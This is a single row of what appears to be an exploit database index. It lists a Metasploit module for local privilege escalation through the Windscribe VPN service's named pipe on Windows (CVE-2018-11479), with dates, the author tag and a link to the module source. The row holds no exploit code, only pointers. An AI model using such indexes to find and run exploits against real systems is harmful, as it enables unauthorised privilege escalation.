 48021,exploits/windows/local/48021.rb,"Windscribe - WindscribeService Named Pipe Privilege Escalation (Metasploit)",2020-02-07,Metasploit,local,windows,,2020-02-07,2020-02-07,1,CVE-2018-11479,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/local/windscribe_windscribeservice_priv_esc.rb